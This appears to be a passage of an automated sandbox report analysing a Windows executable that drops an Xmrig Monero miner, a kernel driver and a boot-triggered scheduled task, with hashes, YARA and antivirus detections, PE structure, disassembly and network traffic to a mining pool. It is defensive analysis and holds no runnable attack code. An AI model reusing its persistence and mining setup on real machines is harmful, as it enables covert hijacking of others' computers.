Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:NlllulKtL:NllUu
MD5:	C8F9DD66CFE2BE470F4787B00918A103
SHA1:	DB276E2D1DE9E108CB7284B636C67E286B661628
SHA-256:	3D42AC60CC94BBD3391E063111ED79327AF58273992B2C79A7B0087BE8151D05
SHA-512:	DAC013D3B42319AC44EC425078DDC6FB58D7F12FB73F462FA678F1D86C5ADA6A799145F6AC04E6220D9797688781AEC3FEB5A9ECD168EA3931B50F25EB1B7B46
Malicious:	false
Preview:	@...e................................................@..........

C:\Windows\Temp\__PSScriptPolicyTest_43ihmlxz.lig.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_a21toqog.igt.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_aemvixed.svf.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_pdb3yzjn.emn.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\gqxqtdeqxchk.sys

Download File

Process:	C:\Program Files\Google\Chrome\updater.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

C:\Windows\Temp\wxyubnjmnlae.tmp

Download File

Process:	C:\Program Files\Google\Chrome\updater.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5345280
Entropy (8bit):	6.701640724838757
Encrypted:	false
SSDEEP:	98304:LrZwo40cLwthpjCU5FLnFUWbU5y1vsdCXZe1bwCUoJXiN5rFkKYVd:Lra1Wbd1vs0JeaCVJX25GKYVd
MD5:	470F48122F70CD013CE039F8049F8906
SHA1:	673B6BE8163580BA70403321663F5EDBB0565F12
SHA-256:	B4B33DDBDD8953EE4BCAAA0F7B71468FAD1F5A7F8CFC7AFCF35810D2B1792D2A
SHA-512:	C44BA477DF1876D507FE24C54957BE6A92C2E7FA498103C49A74A34D6090FB2253DCAF81F36EAF82BB3AEEFCB8A414579EAD130B50523DB842C95299D76D6226
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\Temp\wxyubnjmnlae.tmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Windows\Temp\wxyubnjmnlae.tmp, Author: unknown Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\Temp\wxyubnjmnlae.tmp, Author: Florian Roth Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Windows\Temp\wxyubnjmnlae.tmp, Author: ditekSHen
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......=r.Yy...y...y...2k..p...2k......2k..o...llh.}...ll..j...ll......ll..u...y.......2k..`....c..*...O...;...O.......O...z...O.j.x...y...x...O...x...Richy...........................PE..d..../.d.........."....%..6...L.....DS3........@..........................................`.................................................T.M......`.......................p..\|.....J.......................J.(....J.@.............6.8............................text.....6.......6................. ..`.rdata........6.......6.............@..@.data...d,3...M.......M.............@....pdata................N.............@..@_RANDOMX..............P.............@..`_TEXT_CN.&.......(....P.............@..`_TEXT_CN.....0........P.............@..`_RDATA..\....P........Q.............@..@.rsrc........`........Q.............@..@.reloc..\|....p........Q.............@..B................................

C:\Windows\Temp\yntnomxcupkb.xml

Download File

Process:	C:\Program Files\Google\Chrome\updater.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1490
Entropy (8bit):	5.1015990235428035
Encrypted:	false
SSDEEP:	24:2dk4+SkIMFWYL60YeGlMhEMjn5pwjpILUYODOLqx49RJh7h8gJ15E15LNEB86tn:cC3IQDL60uydbQ9IIYODOLqOdq2sbEx
MD5:	546D67A48FF2BF7682CEA9FAC07B942E
SHA1:	A2CB3A9A97FD935B5E62D4C29B3E2C5AB7D5FC90
SHA-256:	EFF7EDC19E6C430AAECA7EA8A77251C74D1E9ABB79B183A9EE1F58C2934B4B6A
SHA-512:	10D90EDF31C0955BCEC52219D854952FD38768BD97E8E50D32A1237BCCAF1A5EB9F824DA0F81A7812E0CE62C0464168DD0201D1C0EB61B9FE253FE7C89DE05FE
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <Triggers>.. <BootTrigger>.. . <Enabled>true</Enabled>.. </BootTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">... <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <Duration>PT10M</Duration>.. <WaitTimeout>PT1H</WaitTimeout>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabl

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.997223772715359
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	hacn.exe
File size:	12'925'322 bytes
MD5:	98ae932a21fee19c4b51ffa7abd4cec1
SHA1:	e4db77c1248591ba12160223e028004ffd3366d3
SHA256:	d0c18b8e222e3b9c09c05145bab139b63e010ba754f4ff688ee71ac69697a402
SHA512:	5048d263e22a2a425cc2fe5dd5a5e83ae394a9051f0a440ab63a10191bbdbb8dd5c5a28aa76d93db09352b12424b8f1777aa8397a1de1acead0498688a9f4358
SSDEEP:	393216:pDfDoc6GPqN4aMrNyAj/05dNhFx1MmWg:pb7Hqiaa4AjEVxGm
TLSH:	2DD6339065E404F4E8F6EB7EDD512355E0F2B812C320EE979B7887A25E037B19D76382
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.Q...?...?...?.Z.<...?.Z.:...?.Z.;...?.......?...:.9.?...;...?...<...?.Z.>...?...>...?.+.;...?.+.=...?.Rich..?................

File Icon


Icon Hash:	6ce9f1f1f0b2a8b0

Static PE Info

General

Entrypoint:	0x14000c2f0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x65D889B0 [Fri Feb 23 12:04:00 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	1af6c885af093afc55142c2f1761dbe8

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F7A2CB7C95Ch
dec eax
add esp, 28h
jmp 00007F7A2CB7C56Fh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
dec eax
sub esp, 28h
call 00007F7A2CB7CED4h
test eax, eax
je 00007F7A2CB7C713h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ecx, dword ptr [eax+08h]
jmp 00007F7A2CB7C6F7h
dec eax
cmp ecx, eax
je 00007F7A2CB7C706h
xor eax, eax
dec eax
cmpxchg dword ptr [0003418Ch], ecx
jne 00007F7A2CB7C6E0h
xor al, al
dec eax
add esp, 28h
ret
mov al, 01h
jmp 00007F7A2CB7C6E9h
int3
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
movzx eax, byte ptr [00034177h]
test ecx, ecx
mov ebx, 00000001h
cmove eax, ebx
mov byte ptr [00034167h], al
call 00007F7A2CB7CCD3h
call 00007F7A2CB7DDF2h
test al, al
jne 00007F7A2CB7C6F6h
xor al, al
jmp 00007F7A2CB7C706h
call 00007F7A2CB8AD91h
test al, al
jne 00007F7A2CB7C6FBh
xor ecx, ecx
call 00007F7A2CB7DE02h
jmp 00007F7A2CB7C6DCh
mov al, bl
dec eax
add esp, 20h
pop ebx
ret
int3
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
cmp byte ptr [0003412Ch], 00000000h
mov ebx, ecx
jne 00007F7A2CB7C759h
cmp ecx, 01h
jnbe 00007F7A2CB7C75Ch
call 00007F7A2CB7CE3Ah
test eax, eax
je 00007F7A2CB7C71Ah

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3cee4	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x46000	0x16b4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x42000	0x22c8	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x48000	0x758	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3a420	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x3a2e0	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2b000	0x420	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x29d90	0x29e00	15c814a42215e290d8bab54e3db4f28e	False	0.5531133395522388	data	6.488360740396217	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2b000	0x12d0c	0x12e00	01fb73378fcb0c44c83d70903522d725	False	0.5158319536423841	data	5.8200841720422885	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x3348	0xe00	e1f21cabb4e5e084c6e11e610d715023	False	0.13253348214285715	Matlab v4 mat-file (little endian) f\324\377\3772\242\337-\231+, text, rows 4294967295, columns 0	1.8227234993173287	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x42000	0x22c8	0x2400	b142de92a6283807ff34839c180f053c	False	0.4743923611111111	data	5.326103127679494	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA	0x45000	0x15c	0x200	ee29821d11e5dd21c3e807a502fa5813	False	0.38671875	data	2.83326547900447	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x46000	0x16b4	0x1800	0835425949a1b25789cb1265c656d2a9	False	0.6048177083333334	data	5.944758384070383	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x48000	0x758	0x800	7813f7270f60606010808eaa88aee14b	False	0.5439453125	data	5.24418466384704	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x460e8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m	0.6737804878048781
RT_GROUP_ICON	0x47190	0x14	data	1.1
RT_MANIFEST	0x471a4	0x50d	XML 1.0 document, ASCII text	0.4694508894044857

Imports

DLL	Import
USER32.dll	CreateWindowExW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll
KERNEL32.dll	IsValidCodePage, GetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, GetACP, GetOEMCP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, GetModuleFileNameW, CreateSymbolicLinkW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, GetCPInfo, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEndOfFile, SetEnvironmentVariableW, RtlUnwindEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
ADVAPI32.dll	OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll	SelectObject, DeleteObject, CreateFontIndirectW

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
03/01/24-15:22:10.789667	UDP	2036289	ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro)	63417	53	192.168.2.4	1.1.1.1

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 1, 2024 15:22:00.247355938 CET	49729	80	192.168.2.4	208.95.112.1
Mar 1, 2024 15:22:00.340511084 CET	80	49729	208.95.112.1	192.168.2.4
Mar 1, 2024 15:22:00.340667963 CET	49729	80	192.168.2.4	208.95.112.1
Mar 1, 2024 15:22:00.341361046 CET	49729	80	192.168.2.4	208.95.112.1
Mar 1, 2024 15:22:00.436213970 CET	80	49729	208.95.112.1	192.168.2.4
Mar 1, 2024 15:22:00.478470087 CET	49729	80	192.168.2.4	208.95.112.1
Mar 1, 2024 15:22:01.808372021 CET	49730	443	192.168.2.4	185.199.111.133
Mar 1, 2024 15:22:01.808402061 CET	443	49730	185.199.111.133	192.168.2.4
Mar 1, 2024 15:22:01.809842110 CET	49730	443	192.168.2.4	185.199.111.133
Mar 1, 2024 15:22:01.829166889 CET	49730	443	192.168.2.4	185.199.111.133
Mar 1, 2024 15:22:01.829181910 CET	443	49730	185.199.111.133	192.168.2.4
Mar 1, 2024 15:22:02.017334938 CET	443	49730	185.199.111.133	192.168.2.4
Mar 1, 2024 15:22:02.017518044 CET	49730	443	192.168.2.4	185.199.111.133
Mar 1, 2024 15:22:02.021337032 CET	49730	443	192.168.2.4	185.199.111.133
Mar 1, 2024 15:22:02.021348000 CET	443	49730	185.199.111.133	192.168.2.4
Mar 1, 2024 15:22:02.021593094 CET	443	49730	185.199.111.133	192.168.2.4
Mar 1, 2024 15:22:02.072247028 CET	49730	443	192.168.2.4	185.199.111.133
Mar 1, 2024 15:22:02.119625092 CET	49730	443	192.168.2.4	185.199.111.133
Mar 1, 2024 15:22:02.161910057 CET	443	49730	185.199.111.133	192.168.2.4
Mar 1, 2024 15:22:02.257281065 CET	443	49730	185.199.111.133	192.168.2.4
Mar 1, 2024 15:22:02.257577896 CET	443	49730	185.199.111.133	192.168.2.4
Mar 1, 2024 15:22:02.257683992 CET	49730	443	192.168.2.4	185.199.111.133
Mar 1, 2024 15:22:02.266155958 CET	49730	443	192.168.2.4	185.199.111.133
Mar 1, 2024 15:22:06.676457882 CET	49729	80	192.168.2.4	208.95.112.1
Mar 1, 2024 15:22:10.891581059 CET	49731	443	192.168.2.4	142.202.242.43
Mar 1, 2024 15:22:10.891645908 CET	443	49731	142.202.242.43	192.168.2.4
Mar 1, 2024 15:22:10.891720057 CET	49731	443	192.168.2.4	142.202.242.43
Mar 1, 2024 15:22:10.892591953 CET	49731	443	192.168.2.4	142.202.242.43
Mar 1, 2024 15:22:10.892610073 CET	443	49731	142.202.242.43	192.168.2.4
Mar 1, 2024 15:22:11.198739052 CET	443	49731	142.202.242.43	192.168.2.4
Mar 1, 2024 15:22:11.244092941 CET	49731	443	192.168.2.4	142.202.242.43
Mar 1, 2024 15:22:12.807816982 CET	49731	443	192.168.2.4	142.202.242.43
Mar 1, 2024 15:22:12.807864904 CET	443	49731	142.202.242.43	192.168.2.4
Mar 1, 2024 15:22:12.809129000 CET	443	49731	142.202.242.43	192.168.2.4
Mar 1, 2024 15:22:12.809204102 CET	49731	443	192.168.2.4	142.202.242.43
Mar 1, 2024 15:22:12.811022043 CET	49731	443	192.168.2.4	142.202.242.43
Mar 1, 2024 15:22:12.811104059 CET	443	49731	142.202.242.43	192.168.2.4
Mar 1, 2024 15:22:12.925769091 CET	49731	443	192.168.2.4	142.202.242.43
Mar 1, 2024 15:22:12.925795078 CET	443	49731	142.202.242.43	192.168.2.4
Mar 1, 2024 15:22:13.056597948 CET	49731	443	192.168.2.4	142.202.242.43
Mar 1, 2024 15:22:13.056638002 CET	443	49731	142.202.242.43	192.168.2.4
Mar 1, 2024 15:22:13.079005003 CET	49732	80	192.168.2.4	208.95.112.1
Mar 1, 2024 15:22:13.173953056 CET	80	49732	208.95.112.1	192.168.2.4
Mar 1, 2024 15:22:13.174063921 CET	49732	80	192.168.2.4	208.95.112.1
Mar 1, 2024 15:22:13.174366951 CET	49732	80	192.168.2.4	208.95.112.1
Mar 1, 2024 15:22:13.244097948 CET	49731	443	192.168.2.4	142.202.242.43
Mar 1, 2024 15:22:13.269547939 CET	80	49732	208.95.112.1	192.168.2.4
Mar 1, 2024 15:22:13.353462934 CET	49732	80	192.168.2.4	208.95.112.1
Mar 1, 2024 15:22:14.394870043 CET	49733	443	192.168.2.4	185.199.111.133
Mar 1, 2024 15:22:14.394911051 CET	443	49733	185.199.111.133	192.168.2.4
Mar 1, 2024 15:22:14.394998074 CET	49733	443	192.168.2.4	185.199.111.133
Mar 1, 2024 15:22:14.502151966 CET	49733	443	192.168.2.4	185.199.111.133
Mar 1, 2024 15:22:14.502188921 CET	443	49733	185.199.111.133	192.168.2.4
Mar 1, 2024 15:22:14.684576035 CET	443	49733	185.199.111.133	192.168.2.4
Mar 1, 2024 15:22:14.684680939 CET	49733	443	192.168.2.4	185.199.111.133
Mar 1, 2024 15:22:14.700006962 CET	49733	443	192.168.2.4	185.199.111.133
Mar 1, 2024 15:22:14.700018883 CET	443	49733	185.199.111.133	192.168.2.4
Mar 1, 2024 15:22:14.700244904 CET	443	49733	185.199.111.133	192.168.2.4
Mar 1, 2024 15:22:14.719293118 CET	49733	443	192.168.2.4	185.199.111.133
Mar 1, 2024 15:22:14.761919975 CET	443	49733	185.199.111.133	192.168.2.4
Mar 1, 2024 15:22:14.858841896 CET	443	49733	185.199.111.133	192.168.2.4
Mar 1, 2024 15:22:14.858964920 CET	443	49733	185.199.111.133	192.168.2.4
Mar 1, 2024 15:22:14.859061003 CET	49733	443	192.168.2.4	185.199.111.133
Mar 1, 2024 15:22:14.861790895 CET	49733	443	192.168.2.4	185.199.111.133
Mar 1, 2024 15:22:22.123678923 CET	443	49731	142.202.242.43	192.168.2.4
Mar 1, 2024 15:22:22.244127035 CET	49731	443	192.168.2.4	142.202.242.43
Mar 1, 2024 15:22:31.717763901 CET	49748	80	192.168.2.4	208.95.112.1
Mar 1, 2024 15:22:31.811039925 CET	80	49748	208.95.112.1	192.168.2.4
Mar 1, 2024 15:22:31.811191082 CET	49748	80	192.168.2.4	208.95.112.1
Mar 1, 2024 15:22:31.811541080 CET	49748	80	192.168.2.4	208.95.112.1
Mar 1, 2024 15:22:31.938570023 CET	80	49748	208.95.112.1	192.168.2.4
Mar 1, 2024 15:22:32.009726048 CET	49748	80	192.168.2.4	208.95.112.1
Mar 1, 2024 15:22:32.865030050 CET	49749	443	192.168.2.4	185.199.111.133
Mar 1, 2024 15:22:32.865081072 CET	443	49749	185.199.111.133	192.168.2.4
Mar 1, 2024 15:22:32.865142107 CET	49749	443	192.168.2.4	185.199.111.133
Mar 1, 2024 15:22:32.908052921 CET	49749	443	192.168.2.4	185.199.111.133
Mar 1, 2024 15:22:32.908070087 CET	443	49749	185.199.111.133	192.168.2.4
Mar 1, 2024 15:22:33.091387987 CET	443	49749	185.199.111.133	192.168.2.4
Mar 1, 2024 15:22:33.091546059 CET	49749	443	192.168.2.4	185.199.111.133
Mar 1, 2024 15:22:33.093722105 CET	49749	443	192.168.2.4	185.199.111.133
Mar 1, 2024 15:22:33.093734980 CET	443	49749	185.199.111.133	192.168.2.4
Mar 1, 2024 15:22:33.094130039 CET	443	49749	185.199.111.133	192.168.2.4
Mar 1, 2024 15:22:33.114403963 CET	49749	443	192.168.2.4	185.199.111.133
Mar 1, 2024 15:22:33.157912970 CET	443	49749	185.199.111.133	192.168.2.4
Mar 1, 2024 15:22:33.284838915 CET	443	49749	185.199.111.133	192.168.2.4
Mar 1, 2024 15:22:33.284989119 CET	443	49749	185.199.111.133	192.168.2.4
Mar 1, 2024 15:22:33.285048008 CET	49749	443	192.168.2.4	185.199.111.133
Mar 1, 2024 15:22:33.287220955 CET	49749	443	192.168.2.4	185.199.111.133
Mar 1, 2024 15:22:39.896111012 CET	49757	80	192.168.2.4	208.95.112.1
Mar 1, 2024 15:22:39.990602970 CET	80	49757	208.95.112.1	192.168.2.4
Mar 1, 2024 15:22:39.990768909 CET	49757	80	192.168.2.4	208.95.112.1
Mar 1, 2024 15:22:39.991136074 CET	49757	80	192.168.2.4	208.95.112.1
Mar 1, 2024 15:22:40.086672068 CET	80	49757	208.95.112.1	192.168.2.4
Mar 1, 2024 15:22:40.244123936 CET	49757	80	192.168.2.4	208.95.112.1
Mar 1, 2024 15:22:40.905316114 CET	49759	443	192.168.2.4	185.199.111.133
Mar 1, 2024 15:22:40.905369043 CET	443	49759	185.199.111.133	192.168.2.4
Mar 1, 2024 15:22:40.905435085 CET	49759	443	192.168.2.4	185.199.111.133
Mar 1, 2024 15:22:40.935847044 CET	49759	443	192.168.2.4	185.199.111.133
Mar 1, 2024 15:22:40.935878038 CET	443	49759	185.199.111.133	192.168.2.4
Mar 1, 2024 15:22:41.117261887 CET	443	49759	185.199.111.133	192.168.2.4
Mar 1, 2024 15:22:41.117363930 CET	49759	443	192.168.2.4	185.199.111.133
Mar 1, 2024 15:22:41.120178938 CET	49759	443	192.168.2.4	185.199.111.133
Mar 1, 2024 15:22:41.120197058 CET	443	49759	185.199.111.133	192.168.2.4
Mar 1, 2024 15:22:41.120496035 CET	443	49759	185.199.111.133	192.168.2.4
Mar 1, 2024 15:22:41.135762930 CET	49759	443	192.168.2.4	185.199.111.133
Mar 1, 2024 15:22:41.181914091 CET	443	49759	185.199.111.133	192.168.2.4
Mar 1, 2024 15:22:41.291223049 CET	443	49759	185.199.111.133	192.168.2.4
Mar 1, 2024 15:22:41.291352034 CET	443	49759	185.199.111.133	192.168.2.4
Mar 1, 2024 15:22:41.291412115 CET	49759	443	192.168.2.4	185.199.111.133
Mar 1, 2024 15:22:41.293765068 CET	49759	443	192.168.2.4	185.199.111.133
Mar 1, 2024 15:22:41.719918013 CET	49757	80	192.168.2.4	208.95.112.1
Mar 1, 2024 15:22:44.126456976 CET	443	49731	142.202.242.43	192.168.2.4
Mar 1, 2024 15:22:44.244240999 CET	49731	443	192.168.2.4	142.202.242.43
Mar 1, 2024 15:22:46.585103035 CET	443	49731	142.202.242.43	192.168.2.4
Mar 1, 2024 15:22:46.744112968 CET	49731	443	192.168.2.4	142.202.242.43
Mar 1, 2024 15:22:52.024883032 CET	80	49732	208.95.112.1	192.168.2.4
Mar 1, 2024 15:23:01.089523077 CET	443	49731	142.202.242.43	192.168.2.4
